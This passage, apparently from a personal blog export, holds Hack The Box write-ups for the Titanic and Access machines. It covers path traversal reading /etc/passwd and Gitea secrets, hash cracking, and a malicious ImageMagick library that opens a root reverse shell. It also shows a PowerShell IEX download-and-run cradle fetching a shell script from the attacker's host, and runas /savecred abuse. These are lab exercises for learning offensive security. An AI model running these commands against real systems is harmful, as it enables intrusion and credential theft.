deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ------------------------------- HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 12:47:55 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\"../../../../../../../../etc/passwd\" Content-Type: application/octet-stream Content-Length: 1951 Last-Modified: Fri, 07 Feb 2025 11:16:19 GMT Cache-Control: no-cache ETag: \"1738926979.4294043-1951-2222001821\" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin pollinate:x:105:1::/var/cache/pollinate:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin syslog:x:107:113::/home/syslog:/usr/sbin/nologin uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin developer:x:1000:1000:developer:/home/developer:/bin/bash lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin _laurel:x:998:998::/var/log/laurel:/bin/false Thanks to /etc/passwd we spot the user \"developer\". 
We can retrieve the user.txt file with the flag.\nGET /download?ticket=../../../../../../../../home/developer/user.txt HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ------------------------ HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 12:48:04 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\"../../../../../../../../home/developer/user.txt\" Content-Type: text/plain; charset=utf-8 Content-Length: 33 Last-Modified: Wed, 19 Feb 2025 12:36:23 GMT Cache-Control: no-cache ETag: \"1739968583.7440214-33-1704137658\" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive fc0c.....550f <VirtualHost *:80> ServerName titanic.htb DocumentRoot /var/www/html <Directory /var/www/html> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ProxyRequests Off ProxyPass / http://127.0.0.1:5000/ ProxyPassReverse / http://127.0.0.1:5000/ ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined RewriteEngine On RewriteCond %{HTTP_HOST} !^titanic.htb$ RewriteRule ^(.*)$ http://titanic.htb$1 [R=permanent,L] </VirtualHost> dev subdomain : dev.titanic.htb Using ffuf, we find a \"dev\" subdomain. We could have guessed it another way: the user found earlier was \"developer\". 
Actually, I found it by looking at the /etc/hosts file through the LFI found earlier:\n127.0.0.1 localhost titanic.htb dev.titanic.htb 127.0.1.1 titanic WARNING!! The trap: gobuster dns finds nothing. In the future, ffuf must ABSOLUTELY be preferred for finding subdomains!! (The reason is that gobuster dns looks candidate names up in DNS, where titanic.htb exists only in our local hosts file, whereas ffuf with a Host header fuzzes virtual hosts directly against the web server.)\nThis command finds nothing:\ngobuster dns -d titanic.htb -w /usr/share/wordlists/dirb/common.txt\n┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://titanic.htb/ -H \"Host: FUZZ.titanic.htb\" -mc 200 /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.titanic.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ dev [Status: 200, Size: 13983, Words: 1107, Lines: 276, Duration: 135ms] Gitea dev.titanic.htb redirects to a Gitea page.\nMysql password version: '3.8' services: mysql: image: mysql:8.0 container_name: mysql ports: - \"127.0.0.1:3306:3306\" environment: MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!' MYSQL_DATABASE: tickets MYSQL_USER: sql_svc MYSQL_PASSWORD: sql_password restart: always Fuzzing with ffuf By fuzzing with several wordlists, we eventually find the app.ini file and, above all, Gitea's working directory. 
On the Gitea web interface we had found the directory: /home/developer/gitea/data\nBut it took me a lot of time/fuzzing to find that gitea had to be written again...\nI used the LFI in the form of a \".req\" request saved from Burp. I put the word \"FUZZ\" at the right place in the request, i.e. after the data directory to begin with.\nGET /download?ticket=/home/developer/gitea/data/FUZZ HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://titanic.htb/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i Here is the subsequent ffuf run, using our request and a wordlist:\n┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -request download.req -request-proto http -t 64 -w ./gitea_wordlist.txt /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/download?ticket=/home/developer/gitea/data/FUZZ :: Wordlist : FUZZ: /home/kali/htb/Titanic/gitea_wordlist.txt :: Header : Connection: keep-alive :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Header : Host: titanic.htb :: Header : 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 :: Header : Accept-Language: en-US,en;q=0.5 :: Header : Accept-Encoding: gzip, deflate, br :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 64 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ gitea [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 139ms] :: Progress: [2876/2876] :: Job [1/1] :: 404 req/sec :: Duration: [0:00:06] :: Errors: 0 :: -----------we add \"/gitea/FUZZ\" to the .req file and run the search again---------------- ┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -request download.req -request-proto http -t 64 -w /usr/share/wordlists/dirb/common.txt /'___\\ /'___\\ /'___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Header : Host: titanic.htb :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 :: Header : Accept-Language: en-US,en;q=0.5 :: Header : Accept-Encoding: gzip, deflate, br :: Header : Connection: keep-alive :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 64 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 
________________________________________________ [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 104ms] attachments [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 149ms] avatars [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 137ms] conf [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 141ms] home [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms] log [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms] packages [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 267ms] queues [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 249ms] sessions [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 225ms] tmp [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 229ms] :: Progress: [4614/4614] :: Job [1/1] :: 266 req/sec :: Duration: [0:00:13] :: Errors: 0 :: Note the use of a \"gitea_wordlist.txt\". I created it by fetching the source code from GitHub, then I used the following command:\nfind ./gitea-1.22.1/ -type f -exec basename {} \\; > gitea_wordlist.txt GET /download?ticket=/home/developer/gitea/data/gitea/conf/app.ini HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://titanic.htb/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i 
------------------------- HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 22:34:22 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\"/home/developer/gitea/data/gitea/conf/app.ini\" Content-Type: application/octet-stream Content-Length: 2004 Last-Modified: Fri, 02 Aug 2024 10:42:14 GMT Cache-Control: no-cache ETag: \"1722595334.8970726-2004-2176520380\" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive APP_NAME = Gitea: Git with a cup of tea RUN_MODE = prod RUN_USER = git WORK_PATH = /data/gitea [repository] ROOT = /data/git/repositories [repository.local] LOCAL_COPY_PATH = /data/gitea/tmp/local-repo [repository.upload] TEMP_PATH = /data/gitea/uploads [server] APP_DATA_PATH = /data/gitea DOMAIN = gitea.titanic.htb SSH_DOMAIN = gitea.titanic.htb HTTP_PORT = 3000 ROOT_URL = http://gitea.titanic.htb/ DISABLE_SSH = false SSH_PORT = 22 SSH_LISTEN_PORT = 22 LFS_START_SERVER = true LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4 OFFLINE_MODE = true [database] PATH = /data/gitea/gitea.db DB_TYPE = sqlite3 HOST = localhost:3306 NAME = gitea USER = root PASSWD = LOG_SQL = false SCHEMA = SSL_MODE = disable [indexer] ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve [session] PROVIDER_CONFIG = /data/gitea/sessions PROVIDER = file [picture] AVATAR_UPLOAD_PATH = /data/gitea/avatars REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars [attachment] PATH = /data/gitea/attachments [log] MODE = console LEVEL = info ROOT_PATH = /data/gitea/log [security] INSTALL_LOCK = true SECRET_KEY = REVERSE_PROXY_LIMIT = 1 REVERSE_PROXY_TRUSTED_PROXIES = * INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8 PASSWORD_HASH_ALGO = pbkdf2 [service] DISABLE_REGISTRATION = false REQUIRE_SIGNIN_VIEW = false REGISTER_EMAIL_CONFIRM = false ENABLE_NOTIFY_MAIL = false ALLOW_ONLY_EXTERNAL_REGISTRATION = false ENABLE_CAPTCHA = false 
DEFAULT_KEEP_EMAIL_PRIVATE = false DEFAULT_ALLOW_CREATE_ORGANIZATION = true DEFAULT_ENABLE_TIMETRACKING = true NO_REPLY_ADDRESS = noreply.localhost [lfs] PATH = /data/git/lfs [mailer] ENABLED = false [openid] ENABLE_OPENID_SIGNIN = true ENABLE_OPENID_SIGNUP = true [cron.update_checker] ENABLED = false [repository.pull-request] DEFAULT_MERGE_STYLE = merge [repository.signing] DEFAULT_TRUST_MODEL = committer [oauth2] JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g Gitea.db : developer user curl \"http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db\" --output ./gitea.db ┌──(kali㉿kali)-[~/htb/Titanic] └─$ sqlite3 ./gitea.db SQLite version 3.46.1 2024-08-13 09:16:08 Enter \".help\" for usage hints. sqlite> select * from user; 1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0 2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0 3|a|a||a@a.com|0|enabled|0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d|pbkdf2$50000$50|0|0|0||0|||314efc292d5e9576a2154e9bc85facb8|24fc79c6b2aadeb9555d40312ac55460|en-US||1739990352|1739990365|1739990352|0|-1|1|0|0|0|0|1|0|d10ca8d11301c2f4993ac2279ce4b930|a@a.com|0|0|0|0|0|0|0|0|0||gitea-auto|0 Hashcat bruteforce Account created: b : 
123456789\n4|b|b||b@b.com|0|enabled|097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce|pbkdf2$50000$50|0|0|0||0|||d49587abbc61243dfde5146bec7ee24b|47b1683e379bca325752efd85fe1c31b|en-US||1740008072|1740008072|1740008072|0|-1|1|0|0|0|0|1|0|2076105f6efe7c11e285add95f514b9a|b@b.com|0|0|0|0|0|0|0|0|0||gitea-auto|0 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ john --list=format-details --format=pbkdf2-hmac-sha256\nPBKDF2-HMAC-SHA256 125 24 192 01000003 48 PBKDF2-SHA256 256/256 AVX2 8x 0x107 32 188 iteration count 0 $pbkdf2-sha256$1000$b1dWS2dab3dKQWhPSUg3cg$UY9j5wlyxtsJqhDKTqua8Q3fMp0ojc2pOnErzr8ntLE\nsqlite> select name, passwd_hash_algo, salt, passwd from user; administrator|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 developer|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 a|pbkdf2$50000$50|24fc79c6b2aadeb9555d40312ac55460|0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d b|pbkdf2$50000$50|47b1683e379bca325752efd85fe1c31b|097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce\nWhich gives us:\nsha256:50000:2d149e5fbd1b20cf31db3e3c6a28fc9b:cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 sha256:50000:8bf3e3452b78544f8bee9400d6936d34:e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 sha256:50000:24fc79c6b2aadeb9555d40312ac55460:0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d sha256:50000:47b1683e379bca325752efd85fe1c31b:097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce\nFinally, in hashcat format with base64:\nsha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY= sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y= sha256:50000:JPx5xrKq3rlVXUAxKsVUYA==:CuOCVkEBZAZkOhIvfzymxrXPx2q9QAdfc+uN7/TM5USL+pXcWk/4HWLLd5Ic0iSyAQ0= sha256:50000:R7FoPjebyjJXUu/YX+HDGw==:CXw8DNv1C1NrIO9eIrbdjlj7+mIwAD9gpqFVdxB9SGGIFNpeHCmE43df2+o/YcQc0M4=\nWe then find the developer password using hashcat:\n$ hashcat -m 10900 hash_final.txt.b64 ~/wordlists/rockyou.txt hashcat (v6.2.5) starting ... Dictionary cache hit: * Filename..: /home/leopold/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139922195 * Keyspace..: 14344385 sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528 developer : 25282528\nPrivilege Escalation Exploitation: ImageMagick https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8\ndeveloper@titanic:/opt/app/static/assets/images$ find / -writable -type d 2>/dev/null | head /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.socket /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/gpg-agent.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.service /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/init.scope /opt/app/static/assets/images /opt/app/tickets /home/developer /home/developer/.gnupg We find these directories: /opt/app/static/assets/images /opt/app/tickets\nWith this script:\ndeveloper@titanic:/opt/app/static/assets/images$ cat /opt/scripts/identify_images.sh cd /opt/app/static/assets/images truncate -s 0 metadata.log find /opt/app/static/assets/images/ -type 
f -name \u0026#34;*.jpg\u0026#34; | xargs /usr/bin/magick identify \u0026gt;\u0026gt; metadata.log On recherche une CVE pour magick, on trouve que notre version est vulnerable. On trouve le github, on suit les instructions. On construit une fausse librairie qui va executer du code en tant que root. il execute un shell.sh que j\u0026rsquo;ai defini et qui ouvre un revershell.\n1 2 3 4 5 6 7 8 9 10 gcc -x c -shared -fPIC -o ./libxcb.so.1 - \u0026lt;\u0026lt; EOF ##include \u0026lt;stdio.h\u0026gt; ##include \u0026lt;stdlib.h\u0026gt; ##include \u0026lt;unistd.h\u0026gt; __attribute__((constructor)) void init(){ system(\u0026#34;/opt/app/static/assets/images/shell.sh\u0026#34;); exit(0); } EOF 1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ nc -lnvp 6666 listening on [any] 6666 ... connect to [10.10.14.2] from (UNKNOWN) [10.10.11.55] 51460 sh: 0: can\u0026#39;t access tty; job control turned off # whoami root # cat /root/root.txt c304.....3cde Tips ATTENTION !! Le piège : on ne trouve rien avec gobuster dns. A l\u0026rsquo;avenir, il faut prioriser ABSOLUMENT ffuf pour trouver les sous-domaines !! 
","date":"2025-02-21T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/titanic-htb/","title":"HTB | Titanic"},{"content":" Machine name OS IP Difficulty Access Windows 10.10.10.98 Easy Users 1 security : 4Cc3ssC0ntr0ller Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~/htb/Access] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.98 PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can\u0026#39;t get directory listing: TIMEOUT | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet syn-ack ttl 127 Microsoft Windows XP telnetd | telnet-ntlm-info: | Target_Name: ACCESS | NetBIOS_Domain_Name: ACCESS | NetBIOS_Computer_Name: ACCESS | DNS_Domain_Name: ACCESS | DNS_Computer_Name: ACCESS |_ Product_Version: 6.1.7600 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: MegaCorp Foothold FTP Anonymous connexion: Gettings 2 files 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Access/Access Control] └─$ ftp 10.10.10.98 Connected to 10.10.10.98. 220 Microsoft FTP Service Name (10.10.10.98:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp\u0026gt; dir 425 Cannot open data connection. 200 PORT command successful. 150 Opening ASCII mode data connection. 08-23-18 08:16PM \u0026lt;DIR\u0026gt; Backups 08-24-18 09:00PM \u0026lt;DIR\u0026gt; Engineer 226 Transfer complete. ftp\u0026gt; cd Backups 250 CWD command successful. ftp\u0026gt; dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 08-23-18 08:16PM 5652480 backup.mdb 226 Transfer complete. 
ftp> cd ../Engineer\n250 CWD command successful.\nftp> dir\n200 PORT command successful.\n150 Opening ASCII mode data connection.\n08-24-18  12:16AM                10870 Access Control.zip\n226 Transfer complete.\nftp> ^D\n221 Goodbye.\nbackup.mdb and Access Control.zip\nAnalysing the tables in the backup.mdb file, we find the \"auth_user\" table, which contains a potentially interesting PASSWORD field.\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ mdb-schema backup.mdb | grep -i PASSWORD -A30 -B30\n...\nCREATE TABLE [auth_user]\n (\n    [id]            Long Integer,\n    [username]      Text (50),\n    [password]      Text (50),\n    [Status]        Long Integer,\n    [last_login]    DateTime,\n    [RoleID]        Long Integer,\n    [Remark]        Memo/Hyperlink (255)\n);\n...\nWe export the auth_user table and recover 3 user/password credentials.\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ mdb-export backup.mdb auth_user\nid,username,password,Status,last_login,RoleID,Remark\n25,\"admin\",\"admin\",1,\"08/23/18 21:11:47\",26,\n27,\"engineer\",\"access4u@security\",1,\"08/23/18 21:13:36\",26,\n28,\"backup_admin\",\"admin\",1,\"08/23/18 21:14:02\",26,\nNone of them works over FTP or telnet.\nHowever, using the password \"access4u@security\" on the \"Access Control.zip\" file, the archive extracts correctly!\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ 7z x Access\\ Control.zip\n\n7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29\n 64-bit locale=en_US.UTF-8 Threads:3 OPEN_MAX:1024\n\nScanning the drive for archives:\n1 file, 10870 bytes (11 KiB)\n\nExtracting archive: Access Control.zip\n--\nPath = Access Control.zip\nType = zip\nPhysical Size = 10870\n\nEnter password (will not be echoed):\n<<<<<<<<<<<<<<<< access4u@security\nEverything is Ok\n\nSize:       271360\nCompressed: 10870\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ ls\n'Access Control.pst'  'Access Control.zip'  auth_user.txt  backup.mdb\nExtracting emails from the pst file\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ readpst -r Access\\ Control.pst\nOpening PST file and indexes...\nProcessing Folder \"Deleted Items\"\n    \"Access Control\" - 2 items done, 0 items skipped.\nGetting the \"security\" account password from the emails\nsecurity: 4Cc3ssC0ntr0ller\n┌──(kali㉿kali)-[~/htb/Access/Access Control]\n└─$ cat mbox | grep pass\nThe password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.\nTELNET - security account\n┌──(kali㉿kali)-[~/htb/Access/Access Control]\n└─$ telnet 10.10.10.98 23\nTrying 10.10.10.98...\nConnected to 10.10.10.98.\nEscape character is '^]'.\nWelcome to Microsoft Telnet Service\n\nlogin: security\npassword: 4Cc3ssC0ntr0ller\n\n*===============================================================\nMicrosoft Telnet Server.\n*===============================================================\nC:\\Users\\security>type Desktop\\user.txt\n9535.....3f75\nPrivilege Escalation\nPowershell\nIf I simply type \"powershell\", a PowerShell seems to open but it is not stable.\n
So I had to open a reverse shell to get a stable PowerShell:\n----------KALI------------\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...\n10.10.10.98 - - [16/Feb/2025 17:04:22] \"GET /Invoke.ps1 HTTP/1.1\" 200 -\n----------KALI------------\n┌──(kali㉿kali)-[~/htb/Access]\n└─$ nc -lnvp 1337\nlistening on [any] 1337 ...\nconnect to [10.10.16.9] from (UNKNOWN) [10.10.10.98] 49165\nWindows PowerShell running as user security on ACCESS\nCopyright (C) 2015 Microsoft Corporation. All rights reserved.\n\nPS C:\\Users\\security>PS C:\\Users\\security> whoami\naccess\\security\n---------WINDOWS----------\nC:\\Users\\security>powershell /C IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9:8888/Invoke.ps1')\nZKAccess.lnk\nPS C:\\Users\\security> cd ../Public\nPS C:\\Users\\Public> cd Desktop\nPS C:\\Users\\Public\\Desktop> ls\n\n    Directory: C:\\Users\\Public\\Desktop\n\nMode                LastWriteTime     Length Name\n----                -------------     ------ ----\n-a---         8/22/2018  10:18 PM       1870 ZKAccess3.5 Security System.lnk\n\nPS C:\\Users\\Public\\Desktop> cat Z*\n[binary .lnk data; only the readable strings are kept below]\nC:\\Windows\\System32\\runas.exe ..\\..\\..\\Windows\\System32\\runas.exe C:\\ZKTeco\\ZKAccess3.5 /user:ACCESS\\Administrator /savecred \"C:\\ZKTeco\\ZKAccess3.5\\Access.exe\" C:\\ZKTeco\\ZKAccess3.5\\img\\AccessNET.ico %SystemDrive%\\ZKTeco\\ZKAccess3.5\\img\\AccessNET.ico access S-1-5-21-953262931-566350628-63446256-500\nBrowsing through the folders, we find a ZKAccess.lnk file that appears to run an \"Access.exe\" binary with elevated rights:\nWindows\\System32\\runas.exeC:\\ZKTeco\\ZKAccess3.5G/user:ACCESS\\Administrator /savecred \"C:\\ZKTeco\\ZKAccess3.5\\Access.exe\"\nWe see runas being used to execute a file as a specific user; here that user is Administrator (the one we are interested in). Apparently the administrator's credentials are saved, so with the /savecred argument we can run any command as Administrator.\nWe try our Invoke.ps1 script again to open a PowerShell reverse shell as Administrator, and it works. We changed the port in 